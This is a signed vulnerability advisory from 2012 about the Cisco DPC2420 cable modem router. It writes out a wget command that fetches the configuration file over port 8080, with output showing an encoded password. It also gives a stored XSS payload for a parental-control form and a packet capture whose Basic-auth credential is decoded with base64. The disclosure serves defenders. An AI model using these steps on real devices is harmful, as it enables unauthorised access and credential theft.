Cisco DPC2420 - Multiples Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

##
## ->  Title: DPC2420 Multiple vulnerabilities
## -> Author: Facundo M. de la Cruz (tty0)
## -> E-mail: fmdlc@code4life.com.ar
##=20

[0x00]> Details

 Vendor  : Cisco
 Model   : DPC2420
 type    : Cablemodem router.=20
 Firmware: D2425-P10-13-v202r12811-110511as-TRO.bin
 Software: D2425-P10-13-v202r12811-110511as-TRO
 Website : http://www.cisco.com/web/consumer/support/modem_DPC2420.html

[0x01]> Configuration file disclosure

Some ISP's (like the Argentinean Telecentro) could make some changes in the=
 router configration via the=20
TCP 8080 port.

If the remote config option is enabled and the port is not filter, an attac=
ker can download this file=20
calling the correct URL. For example:


$ wget http://foobar:8080/filename.gwc -O filename.gwc=20
- --2012-12-08 21:24:43--  http://foobar:8080/filename.gwc
Connecting to foobar:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/octet-stream Content-transfer-encoding: bi=
nary]
Saving to: =E2=80=9Cfilename.gwc=E2=80=9D

    [  <=>                                                          ] 15,=
927      50.9K/s   in 0.3s   =20

2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159=
27]

$ head -n 10 filename.gwc=20
CRCVALUE=4144540802;
#<<Begin of Configuration File>>
Version=1.1;
Created Date=2012/12/8;
Created Time=21:24:43;
Model Number=DPC2420;
Serial Number=234905123;
User Password=ky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw=
l0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR
7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL=
Jz3HV6ci5wn3gMPi0rSTkUc3pzHdiK
WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V=
ewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6
3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg==;
[---OUTPUT OMITTED FOR SPACE REASONS---]

[0x02]> - Persistent XSS

With a valid user in the router web interface for managment and configurati=
on, a user could insert JavaScript
code in this forms and make a XSS, for example add a parental rule called "=
'/><script>alert(1)</script>.

http://192.168.0.1/RgParentalBasic.asp

- -> Attachments: http://tty0.code4life.com.ar/CISCO-DPC2420-XSS.png

[0x03]> Authtype Basic=20

An attacker making an ARP poisoning attack could get the router loggin cred=
entials due the web interface=20
authentication type is auth-basic.=20
Then the attacker could get the Base64 encoded password and convert it to p=
lain text easily.=20

20:58:47.879985 IP 172.16.1.242.34464 > 192.168.0.1.http: Flags [P.], seq 0=
:372, ack 1, win 115

        0x0000:  4500 01a8 fdf4 4000 4006 ccaf ac10 01f2  E.....@.@.......
        0x0010:  c0a8 0001 86a0 0050 e4cf 13e5 76c7 819e  .......P....v...
        0x0020:  8018 0073 03c2 0000 0101 080a 055f ee19  ...s........._..
        0x0030:  0000 be7e 4745 5420 2f73 6967 6e61 6c2e  ...~GET./signal.
        0x0040:  6173 7020 4854 5450 2f31 2e31 0d0a 486f  asp.HTTP/1.1..Ho
        0x0050:  7374 3a20 3139 322e 3136 382e 302e 310d  st:.192.168.0.1.
        0x0060:  0a55 7365 722d 4167 656e 743a 204d 6f7a  .User-Agent:.Moz
        0x0070:  696c 6c61 2f35 2e30 2028 5831 313b 204c  illa/5.0.(X11;.L
        0x0080:  696e 7578 2078 3836 5f36 343b 2072 763a  inux.x86_64;.rv:
        0x0090:  3136 2e30 2920 4765 636b 6f2f 3230 3130  16.0).Gecko/2010
        0x00a0:  3031 3031 2046 6972 6566 6f78 2f31 362e  0101.Firefox/16.
        0x00b0:  300d 0a41 6363 6570 743a 2074 6578 742f  0..Accept:.text/
        0x00c0:  6874 6d6c 2c61 7070 6c69 6361 7469 6f6e  html,application
        0x00d0:  2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69  /xhtml+xml,appli
        0x00e0:  6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39  cation/xml;q=0.=
9
        0x00f0:  2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365  ,*/*;q=0.8..Acc=
e
        0x0100:  7074 2d4c 616e 6775 6167 653a 2065 6e2d  pt-Language:.en-
        0x0110:  5553 2c65 6e3b 713d 302e 350d 0a41 6363  US,en;q=0.5..Ac=
c
        0x0120:  6570 742d 456e 636f 6469 6e67 3a20 677a  ept-Encoding:.gz
        0x0130:  6970 2c20 6465 666c 6174 650d 0a43 6f6e  ip,.deflate..Con
        0x0140:  6e65 6374 696f 6e3a 206b 6565 702d 616c  nection:.keep-al
        0x0150:  6976 650d 0a52 6566 6572 6572 3a20 6874  ive..Referer:.ht
        0x0160:  7470 3a2f 2f31 3932 2e31 3638 2e30 2e31  tp://192.168.0.1
        0x0170:  2f77 6562 7374 6172 2e68 746d 6c0d 0a41  /webstar.html..A
        0x0180:  7574 686f 7269 7a61 7469 6f6e 3a20 4261  uthorization:.Ba
        0x0190:  7369 6320 4f6b 4d30 626d fa38 3443 a9c0  sic.aWFtYXBhc3N3
        0x01a0:  1b4e 1134 640a 054b                      ZAo==....

- From 0x0180 offset to the end of the packet payload the attacker could ge=
t the password=20
encoded with Base64 and simply convert it to plain text:

$ echo aWFtYXBhc3N3ZAo== | base64 -d
iamapassword

- ---
1355011796

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJQxAalAAoJENeXyOFXJgeJY5cP/2/1n/KGlXcyGLPbbzOa2517
EW4UXl4apvKWWOfRfem7+zA/Y4Epxw2l3153Dbp52u2FWPSHzzI3ETK3zY8EYGjL
JkBixPSURV8wPwl33XlM/i0dYbtgVspYEgbtFF/ox1mHe4yPapageu3W0rQvf1fX
IcmS7gS7os65ch9nLH5CpqJBcpxw+n131iI8g5yJ8rmGmkjre8cIwsvG4tNfyZGo
X96pgTzjYnLQww1UoGSkhhKEAudCwb6gqsuGNSbal/Sg1KXj3vmqeZlxWrDEGcuV
fbyGYrn5/+mlayzZLChPSoZrET6qKr78PEPGz5sp0d4mRVz6txr0tpnmmY7aIKL0
HlwhlN6nCbzmuq1RrBL+1FHMAP0Xi7JN6WH5AuDW75r5QO8CyYxIm8TlqXMScJYH
bhX2CmfqkYpKsx3bbxDlqn5cCLUUdEm7UM/TuLcvzzAiyamBQgsrNCI6TOXClFRB
zf321LYlndkJuziYkjTjnJHtroaNh9I0jJMZhVFLJSTuAXmCp0OutPveWEvEX/h9
s6/7Iyi952A3YkqCEsy4q8JUaoxGLMvXeUZM71zVvwEeF8M/2BPziU/JleHMdXWq
X2XH8V94KuiILuFSeS+rtT5ILJDHyWL9uVc1wIWvl33jnhPqSCgPlWvwLuWHBf+G
E7C4vqJfmBNShPTbtb67
=Ezto
-----END PGP SIGNATURE-----